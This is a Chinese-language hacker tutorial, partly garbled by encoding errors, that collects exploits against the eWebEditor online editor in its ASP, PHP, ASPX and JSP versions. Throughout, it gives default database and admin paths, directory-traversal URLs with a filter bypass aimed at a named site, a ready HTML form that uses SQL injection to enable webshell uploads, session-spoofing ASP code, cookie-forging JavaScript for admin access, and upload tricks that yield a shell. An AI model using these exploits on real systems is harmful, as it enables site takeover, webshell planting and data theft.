轉(zhuǎn)載請注明Minghacker's
Ewebeditor編輯器目前分為asp,aspx����,php,jsp四種程序���,各類ewebeditor版本很多�����,功能強(qiáng)大頗收使用者喜愛�����,在國內(nèi)使用極為廣泛。于是像windows一樣被黑客們挖掘出很多漏洞��,大家莫急���,筆者M(jìn)inghacker總結(jié)前人基礎(chǔ)��,一一道來���。
對于目前asp版本的ewebeditor編輯器漏洞主要分為以下7點:
默認(rèn),遍歷目錄漏洞�����,一句話�����,注入��,構(gòu)造����,cookie欺騙����,社工(踩腳印入侵),
NO1.ewebeditor編輯器一般默認(rèn)數(shù)據(jù)庫路徑是db/ewebeditor.mdb
默認(rèn)的后臺路徑是admin_login.asp
建議最好檢測下admin_style.asp文件是否可以直接訪問
舉例:
數(shù)據(jù)庫SouthidcEditor\Datas\SouthidcEditor.mdb
沒登陸頁面。
利用方法:PopUp.asp頁面?zhèn)鲌D片小馬�����,nc提交,得shell
NO2.遍歷目錄漏洞(具體如下):
登陸編輯器---上傳文件管理---選擇樣式目錄(隨便選一個目錄)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整個網(wǎng)站文件了
此漏洞危害大大的����,絕對恐怖
NO3.當(dāng)數(shù)據(jù)庫被管理員修改為asp、asa后綴的時候����,可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫����,然后一句話木馬客戶端連接拿下webshell
NO4.有的時候爆了數(shù)據(jù)庫找不到后臺地址讓人發(fā)急,其實可以試試查看樣式表��,有沒別人加入的asp����、asa后綴樣式表���,也就是雖說的踩著腳印入侵���。
還有的時候聰明的管理員也就是加“#”不妨社工試試,我可沒少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp ��、db/#ewebeditor.mdb
NO5.注入2.1.6的注入就不多說了��,如下保存為html文件修改action���,直接上傳cer馬
<H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
ewebeditor 5.2 列目錄漏洞
出現(xiàn)漏洞的文件存在于ewebeditor/asp/browse.asp
ASP/Visual Basic代碼
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir變量,這個值等下我們可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If
If sDir <> "" Then
If InstrRev(sDir, "/") > 1 Then
s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
Else
s_Url = ""
End If
s_List = s_List & "" & _
"" & _
".." & _
" " & _
""
End If
'Response.Write sDir&"!"&s_List
Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" & oSubFolder.Name
End If
s_List = s_List & "" & _
"" & _
"" & oSubFolder.Name & "" & _
" " & _
""
Next
'Response.Write s_List
Set oUploadFiles = oUploadFolder.Files
For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'這行讓人有點郁悶,檢測了所有允許的文件后綴,如不允許就無法列出,不然就不只列出目錄名和圖片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir & "/" & sFileName
End If
s_List = s_List & "" & _
"" & FileName2Pic(sFileName) & "" & _
"" & sFileName & "" & _
"" & GetSizeUnit(oUploadFile.size) & "" & _
""
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir & ""
's_Url = "/" & sDir & "/"
End If
s_List = s_List & ""
s_List = HTML2JS(s_List)
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
GetList = s_List
End Function
'如果沒有下面這步檢測的話,應(yīng)該就可以列出目錄中所有的文件了,有點郁悶..現(xiàn)在只能列出允許后綴的文件和目錄名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If
Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我們順著代碼往下找,發(fā)現(xiàn)sCurrDir的值是通過下面的值得到的
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), "|||")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next
If bValidStyle = False Then
OutScript("alert('Invalid Style.')")
End If
sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1
If nAllowBrowse <> 1 Then
OutScript("alert('Do not allow browse!')")
End If
sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> "/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" & sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" & sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" & sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" & sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" & sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"
Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" & aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" & aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" & aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" & aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" & aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath = RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select
Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select
sCurrDir = sUploadDir '注意這里,這個是得到了配置的路徑地址
sDir = Trim(Request("dir")) '得到dir變量
sDir = Replace(sDir, "\", "/") '對dir變量進(jìn)行過濾
sDir = Replace(sDir, "../", "")
sDir = Replace(sDir, "./", "")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
'重點就在這里了,看到?jīng)]有,當(dāng)sUploadDir & sDir存在的時候,sCurrDir就為sUploadDir & sDir的值了
'雖然上面對sDir進(jìn)行了過濾,不過我們完全可以跳過.具體利用st0p會在下面的利用中給出
Else
sDir = ""
End If
End If
End Sub
嘿嘿,看到這你應(yīng)該明白了,其實就是對dir過濾的問題,我們完全可以構(gòu)造特殊的值來跳過驗證,這樣就可以得到目錄結(jié)構(gòu)和顯示設(shè)置文件中允許的文件后綴的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p測試的時候,上傳目錄是根目錄下的uploadfile,通過上面的地址就可以得到根目錄下的所有目錄了.
嘿嘿,如果你發(fā)現(xiàn)打開的時候顯示的是空白,不要灰心,這就對了,直接查看源代碼,看到了嗎,里面就有你根目錄的目錄名字了.
嘿嘿,他根目錄下有個guest目錄,我們通過下面的地址可以列出他下面的結(jié)構(gòu)
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我們也可以通過
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上層跳,我測試的那個虛擬主機(jī),得到的是www,logfile,datebase這三個目錄.
eWebEditorv5.5asp存在session欺騙漏洞�!
記得以前eWebEditor在線編輯器有個session欺騙漏洞沒想到5.5版本也存在��!
代碼如下:
'登錄檢查
Function ChkLogin()
If session("editor_admin")="" or IsNull(session("editor_admin")) Then
PhilLogin()
session.CodePage = session("PreCodePage")
response.End
End If
End Function
呵呵很明顯和以前的版本漏洞一樣���!
只是判斷了session.
利用方法:
新建立個hkok8.asp內(nèi)容為
<%Session("editor_admin") = "admin"%>
然后訪問hkok8.asp 最后訪問登陸文件.刷新ok進(jìn)去了...
要進(jìn)行這種Session欺騙,必須有三個前提:
1.進(jìn)行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個網(wǎng)站內(nèi).
2.必須知道管理頁面����。
3.必須知道Session變量以及它的限制條件。
php版ewebeditor 3.8的漏洞
php版本后臺是調(diào)用../ewebeditor/admin/config.php,大家去看下源碼就知道���,在這里我說說利用方法:
1 首先當(dāng)然要找到登陸后臺,默認(rèn)是../eWebEditor/admin/login.php,進(jìn)入后臺后隨便輸入一個用戶和密碼,當(dāng)然會提示出錯了,必須是出錯的時候��,然后這時候你清空瀏覽器的url,然后輸入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回車,
2 然后輸入正常情況才能訪問的文件../ewebeditor/admin/default.php就可以進(jìn)后臺了
3 后面的利用和asp一樣,新增樣式修改上傳,就ok了
測試一下asp 2.8版本的,竟然一樣可以用,爽,看來asp版的應(yīng)該可以通殺(只測試2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell
jsp的上傳漏洞以及那個出了N久了,由于沒有上傳按鈕,選擇好要上傳的shell,直接回車就可以了
400 186 1886
